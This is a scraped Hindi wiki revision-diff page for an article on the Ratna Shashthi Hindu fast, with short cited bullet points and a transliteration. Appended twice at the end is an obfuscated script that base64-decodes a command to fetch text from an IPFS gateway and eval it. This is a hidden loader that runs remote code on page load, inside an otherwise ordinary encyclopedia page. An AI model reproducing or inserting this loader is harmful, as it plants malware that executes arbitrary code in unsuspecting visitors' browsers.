Difference between revisions of "रत्न षष्ठी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - "ref>(" to "ref>")
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*रत्नषष्ठी व्रत मृच्छकटिका<ref> (मृच्छकटिका अंक 3)</ref> एवं चारुदत्त <ref>(चारुदत्त अंक 3, पृ0 63, भासलिखित)</ref> में उल्लिखित है।
+
*रत्नषष्ठी व्रत मृच्छकटिका<ref> (मृच्छकटिका अंक 3)</ref> एवं चारुदत्त <ref>चारुदत्त अंक 3, पृ0 63, भासलिखित)</ref> में उल्लिखित है।
 
*वहाँ '''ननु षष्ठीम् उपवसामि''' नामक शब्द आये हैं, किन्तु यह कहना कठिन है कि यह रत्न [[षष्ठी]] है या कोई और।
 
*वहाँ '''ननु षष्ठीम् उपवसामि''' नामक शब्द आये हैं, किन्तु यह कहना कठिन है कि यह रत्न [[षष्ठी]] है या कोई और।
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Revision as of 12:16, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • ratnashashthi vrat mrichchhakatika[1] evan charudatt [2] mean ullikhit hai.
  • vahaan nanu shashthimh upavasami namak shabd aye haian, kintu yah kahana kathin hai ki yah ratn shashthi hai ya koee aur.

tika tippani aur sandarbh

  1. (mrichchhakatika aank 3)
  2. charudatt aank 3, pri0 63, bhasalikhit)

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>